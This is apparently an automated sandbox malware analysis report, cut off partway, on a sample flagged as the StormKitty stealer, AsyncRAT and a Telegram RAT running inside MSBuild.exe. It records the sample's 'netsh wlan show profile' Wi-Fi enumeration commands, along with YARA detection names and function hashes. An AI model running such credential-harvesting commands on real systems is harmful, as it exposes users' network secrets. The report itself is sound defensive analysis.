00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2120819083.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:18:45
Start date:	01/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0xb20000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	03:19:28
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:19:28
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:19:28
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0xe00000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:19:28
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show profile
Imagebase:	0x15c0000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:19:28
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr All
Imagebase:	0xe20000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:19:28
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	03:19:28
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:19:28
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0xe00000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	03:19:28
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show networks mode=bssid
Imagebase:	0x15c0000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	18.5%
Dynamic/Decrypted Code Coverage:	98.5%
Signature Coverage:	6.1%
Total number of Nodes:	197
Total number of Limit Nodes:	16

Executed Functions

Function 07524D8F Relevance: 5.6, Instructions: 5644
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2130367257.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 510bd8ec4f86f7fca975604e610fb3c87ebf512267fbc1d14b57fb5fe0e1e452
Instruction ID: fa41a803ec1120492d19f523da1be3e9822ef1df1d57730adc0dd98ce3bf348c
Opcode Fuzzy Hash: 510bd8ec4f86f7fca975604e610fb3c87ebf512267fbc1d14b57fb5fe0e1e452
Instruction Fuzzy Hash: E3C33E70A11218CFDB68FF38DA856ACBBB2BB89300F0045E9D448A7654EF395E85DF51

Function 07524DA8 Relevance: 5.6, Instructions: 5633
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2130367257.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0adb5f8492ebcc209dfeca839454d481008623d41ce2b00537a98e1857d28756
Instruction ID: 4c27ac05b1eea2e7526a3c12825c43509c460f57a9895b656e469a99c6dbeb80
Opcode Fuzzy Hash: 0adb5f8492ebcc209dfeca839454d481008623d41ce2b00537a98e1857d28756
Instruction Fuzzy Hash: 20C33E70A11218CFDB68FF38D9896ACBBB2BB89300F0045E9D448A7654EF395E85DF51

Function 06095B78 Relevance: 5.2, Instructions: 5170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2129428057.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6090000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81245460c9282fa436aba9f0039a961635c84cb462a3452d469e843d5752fbdb
Instruction ID: 346c6139cb15c48a2aff524bdb177d29e754c568649fccd6700a959fc8d70b4d
Opcode Fuzzy Hash: 81245460c9282fa436aba9f0039a961635c84cb462a3452d469e843d5752fbdb
Instruction Fuzzy Hash: 4FB30D70A11618CFDB18EF39E99866DBBF2BB84700F4085EAD488A7294DF395D84CF51

Function 075DAFF0 Relevance: 2.7, Strings: 2, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Q+(i, xrefs: 075DB12F
Q+(i, xrefs: 075DB13D

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID: Q+(i$Q+(i
API String ID: 0-3998099878
Opcode ID: 560786803616eedd5816fced31933d0b6b2790073cfae6f63317ecf74bf26b84
Instruction ID: 8a2574cda66b07029be58b9faaa7cc4ef683d100cf4a61130b56d1e31d6a034d
Opcode Fuzzy Hash: 560786803616eedd5816fced31933d0b6b2790073cfae6f63317ecf74bf26b84
Instruction Fuzzy Hash: 5881F1B0D01219CFCB14DFA9C984AEEBBF2BF89300F24842AD426BB250D7345A45CF54

Function 075D3A90 Relevance: 2.7, Strings: 2, Instructions: 167
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Q!, xrefs: 075D3CED
Q!, xrefs: 075D3CDF

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID: Q!$Q!
API String ID: 0-2963764794
Opcode ID: c3b3a0ed4bb29e79b8e5dd09845069c2c8f22bdb3d096d5074e1b98fc1af4c03
Instruction ID: 0430ebcce10ff23bfe3534184fa12dc5c37a618deb66f49ca8d1284224a063be
Opcode Fuzzy Hash: c3b3a0ed4bb29e79b8e5dd09845069c2c8f22bdb3d096d5074e1b98fc1af4c03
Instruction Fuzzy Hash: 8171E2B4E00209DFDB18DFA9D5846EEBBB2FF88300F20912AD546AB394DB345945CF55

Function 075DAA58 Relevance: 1.7, APIs: 1, Instructions: 164
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessAsUserW.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 075DABC3

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 153be8d8948748301834aec6531cdc476a02d6cbe662e5bf3eba45747b76f6f6
Instruction ID: 187ff095c2f9f758ad0175b051eb03d8dda6aae577d2f704388a717992eebf82
Opcode Fuzzy Hash: 153be8d8948748301834aec6531cdc476a02d6cbe662e5bf3eba45747b76f6f6
Instruction Fuzzy Hash: B651D5B190026ADFDB24CF59C844BDEBBB5BF48310F0484AAE919B7250DB759E85CF90

Function 075D3A80 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

Q!, xrefs: 075D3CED

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID: Q!
API String ID: 0-1344094416
Opcode ID: 126a99f490553466d3d3c06dacef0893d4b19958892f9442edbe799443d40ecc
Instruction ID: f420f9d08c48ea890b65870d0130022fc446aca07bafa9f44a781f74a97494b8
Opcode Fuzzy Hash: 126a99f490553466d3d3c06dacef0893d4b19958892f9442edbe799443d40ecc
Instruction Fuzzy Hash: 317103B4E04209DFEB08DFA9D4846EEBBB2FF88300F20852AD546A7394DB345945CF55

Function 075EA8E8 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

<, xrefs: 075EAA1D

Memory Dump Source

Source File: 00000000.00000002.2130509221.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75e0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: 2db49acad70f66ca1a767d5857282846ca08b06270e726eeb9013b6a6b05fc18
Instruction ID: 6279b53477744cdb511e50c61e7436358586b223cd02ff5f8a6074f489c4e296
Opcode Fuzzy Hash: 2db49acad70f66ca1a767d5857282846ca08b06270e726eeb9013b6a6b05fc18
Instruction Fuzzy Hash: E86176B5D00658CFDB58CFAAC9446DDBBF2AF89301F14C0AAD409AB265DB345A85CF50

Function 02B26A98 Relevance: .6, Instructions: 621COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120735008.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 502df7d286a7734267dbe6aefbe9757697219af81103b0574136a61e4438c3a1
Instruction ID: ceed91596e9a68b363509a2e408b84fac824499b6c3f7c0809cb1743049e0427
Opcode Fuzzy Hash: 502df7d286a7734267dbe6aefbe9757697219af81103b0574136a61e4438c3a1
Instruction Fuzzy Hash: 69328B70A002298FDB14DF69C944BAEBBBAFF89304F148569E8099B391DF34DC45DB90

Function 06075C98 Relevance: .6, Instructions: 599COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129350714.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6070000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83a4367d08d2cad7afef122c11bb10a11b545d15b7f56b6138e11b59e50ab1c1
Instruction ID: bb1d75c180cf33c63e08e458f45624d8885127d52754b6f65366b55288533d28
Opcode Fuzzy Hash: 83a4367d08d2cad7afef122c11bb10a11b545d15b7f56b6138e11b59e50ab1c1
Instruction Fuzzy Hash: 74525B34A003458FDB14DF28C844BD9B7F2BF85314F2582A9D5596F3A2DB71AA86CF81

Function 06075CC8 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129350714.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6070000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a336000ef7bd0554ede49ac6d6419bf375ccc8ce9c3900576a2eff98af70be
Instruction ID: 2d82c429ff3bd87157fd0fc5cd2a99e6356e1ca264649d67b20c138883831881
Opcode Fuzzy Hash: e4a336000ef7bd0554ede49ac6d6419bf375ccc8ce9c3900576a2eff98af70be
Instruction Fuzzy Hash: BF526A34A003458FDB14DF28C844BD9B7F2BF89314F2582A9D5596F3A2DB71A986CF81

Function 02B27288 Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120735008.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 233e8f2020591bbae936033dfb83357073712371b77561f859dcd8db07f64043
Instruction ID: 5b0903b29daccf66ff61f1dee1e94d7c06d8973c28f3bfc9bb54e511c84c71b3
Opcode Fuzzy Hash: 233e8f2020591bbae936033dfb83357073712371b77561f859dcd8db07f64043
Instruction Fuzzy Hash: 20D15D70A00229CFCB15CFA9C984AADFBB6FF88344F1481A5E819AB265DB34DC45DF54

Function 02B2F108 Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120735008.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 625f982815512f1ee46b47ead43720dc04a111f7d93993a335f830ae41c8ae13
Instruction ID: 59fd6045d6e3ef0571146688a5e3212e5c33bc409eeeaf27a14c6e34014478aa
Opcode Fuzzy Hash: 625f982815512f1ee46b47ead43720dc04a111f7d93993a335f830ae41c8ae13
Instruction Fuzzy Hash: 68E1A374E00228CFEB28DFA9C944BADBBB2BF88300F1481A9D50DAB255DB345D85DF55

Function 075D5D50 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8c135886b2cf7e543f93ca89017e25c966d1fd11fc86a3d21111459aa08bc95
Instruction ID: 5e1f361fcec543c416f67b31c86a2e12e3cc360ec52aa76afe08796b1b1c02e0
Opcode Fuzzy Hash: e8c135886b2cf7e543f93ca89017e25c966d1fd11fc86a3d21111459aa08bc95
Instruction Fuzzy Hash: 81E13974A002698FCB68DF29C944BDDBBB6BF89300F10C9E6D44AA7254DB749E85CF40

Function 075EE500 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130509221.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75e0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfe595d0b69d86b86e34fc3aac757f28186ed18e06e72a0ab2fe08a652501fb1
Instruction ID: fe914699c5fe65c6bdb2d41fe7845f383167efddc78669034d43711d0a684b74
Opcode Fuzzy Hash: cfe595d0b69d86b86e34fc3aac757f28186ed18e06e72a0ab2fe08a652501fb1
Instruction Fuzzy Hash: C3C14FB4E1020ADFEB08CF99D4818EEFBB6FF89300F10956AD515AB254D734A946CF94

Function 02B2CE00 Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120735008.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2d0ccd59f33fb7a1cbe2bb408719c21568c110d5697b434423ec059e7f77186
Instruction ID: efb75d6086faebee72b933912d9089a2a4e39c51fe5ad58cb4e8bc7d70a13de0
Opcode Fuzzy Hash: a2d0ccd59f33fb7a1cbe2bb408719c21568c110d5697b434423ec059e7f77186
Instruction Fuzzy Hash: 36B1C534A01319CFDB18DFB5C454A9EBBB2FF8A305F209469D405AB3A4CB7A9946CF14

Function 02B24840 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120735008.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c171353b842d7d4269506e5018a0ed4c1295c29c519f8278a25919866fe2cf4d
Instruction ID: 1a5b1e40cc97bd612e416491987573f0075a098720f10eea6d9ea95108c5a854
Opcode Fuzzy Hash: c171353b842d7d4269506e5018a0ed4c1295c29c519f8278a25919866fe2cf4d
Instruction Fuzzy Hash: 28C1E274E01228CFEB28DFA5C944B9DBBB2BF89300F1480A9D509AB355DB345E85DF51

Function 075EC4C1 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130509221.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75e0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f43c8e43d38bf03fe729707961944876060ee8e4734da1bbfd5d4aa2d085c28c
Instruction ID: 3dfe35fc58fdd00fdb0fe5a7b6d8c894ddfa71241d146364a1c2174eb018d436
Opcode Fuzzy Hash: f43c8e43d38bf03fe729707961944876060ee8e4734da1bbfd5d4aa2d085c28c
Instruction Fuzzy Hash: 8981F5B4E012198FDB08CFAAD944AEEFBB2FF89310F14842AD519AB355D7349905CF60

Function 075EC4F8 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130509221.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75e0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5407d5676e91c50d809b36f75f017e983cdde18cfac0582b75efb84b0f1ad68c
Instruction ID: 0df17f10806b3c690da2b336a644972a15c799db5a9683365f8fc77d87684ad4
Opcode Fuzzy Hash: 5407d5676e91c50d809b36f75f017e983cdde18cfac0582b75efb84b0f1ad68c
Instruction Fuzzy Hash: 5C71B1B4E002198FDB08CFAAD944AEEFBB2FF89300F10852AD519AB354D7349905CF60

Function 02B24831 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120735008.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ba5a66c4145697bcad1a93ce07309d62f8e5be4ecc34d67b2fd08fd0b3c30b2
Instruction ID: a1e63f26fc98738f40b26ab6ecf2836b4e4b4d80e7ab3658f6a253fedff2cd4e
Opcode Fuzzy Hash: 2ba5a66c4145697bcad1a93ce07309d62f8e5be4ecc34d67b2fd08fd0b3c30b2
Instruction Fuzzy Hash: 7861D274E002588FEB18DFAAC944B9DBBF2BF89300F24C06AD809AB255DB355945DF11

Function 02B2F0F8 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120735008.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd33d1ef4ed0f23c073615c7c407fbd6287e6583e2f39eaebaa9a7bd36074c45
Instruction ID: 65d82f0cb11b59569ac123fcbeb2f48600cdd6727e019682d62e42a9f5bb827f
Opcode Fuzzy Hash: cd33d1ef4ed0f23c073615c7c407fbd6287e6583e2f39eaebaa9a7bd36074c45
Instruction Fuzzy Hash: 7461C574E00318DFEB28DFA6C944BADBBF2BF89300F248169D408AB255DB345986DF55

Function 075D5430 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 384192e116e0ffaf6a679fb230ddba66dc32fcd7bd22bcf717afcc8dbeb14058
Instruction ID: cb85ae636c00dd06d54396518cee3128e3e521c3073ea9d7a317903302bd2adc
Opcode Fuzzy Hash: 384192e116e0ffaf6a679fb230ddba66dc32fcd7bd22bcf717afcc8dbeb14058
Instruction Fuzzy Hash: 766159B0D05219DFDB18CFA9D4486EDBBB2FF89311F10882AD412A7340E7789905CF61

Function 075D541F Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 302c667d468664384eccea92d9f59ebb113b453d5567ff89597b292c099f7c11
Instruction ID: 1021be8f1ec588bc6318a0034b2243ab96403ed9c508884d4235e022de3dbd5a
Opcode Fuzzy Hash: 302c667d468664384eccea92d9f59ebb113b453d5567ff89597b292c099f7c11
Instruction Fuzzy Hash: 99516BB0D05219DFDB18CFA9C4486EEBBB2FF49311F14982AD416A7280E7789D15CF61

Function 075ECC2F Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130509221.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75e0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f716a2bd0f8cf7a63294873c067a6c47561a62434625f0031df3e557220a2e0
Instruction ID: e6e44e7464f177b640ceaa8094f649af5b910298fe590c7556ac6f9ba67cd7fa
Opcode Fuzzy Hash: 3f716a2bd0f8cf7a63294873c067a6c47561a62434625f0031df3e557220a2e0
Instruction Fuzzy Hash: AC512CB0E14209CFDB08CFAAC5406EEFBF6BF89300F24D46AD519A7254D7348A418FA4

Function 075D51E8 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3ba20fc9cfab0a586403246a20eb8a7b4e60f5342445733007dc5334339dda7
Instruction ID: 1a1342aa58824d46584d5642c70436f6106337df83cb0fc2b18cc971239f6ce6
Opcode Fuzzy Hash: a3ba20fc9cfab0a586403246a20eb8a7b4e60f5342445733007dc5334339dda7
Instruction Fuzzy Hash: F1418CB0D1420ADFCB14CFEAD4415EEFBB2FF8A310F04982AD511A7254E3794A598FA4

Function 075D51F8 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dd2fd9235aa98fe8e05caccff302658636b26216ca4f810dc89fbdb7af45be5
Instruction ID: 15e3e8c78f5ac142bed097381ebd96afdbd476790cf78ca60775383568cc083d
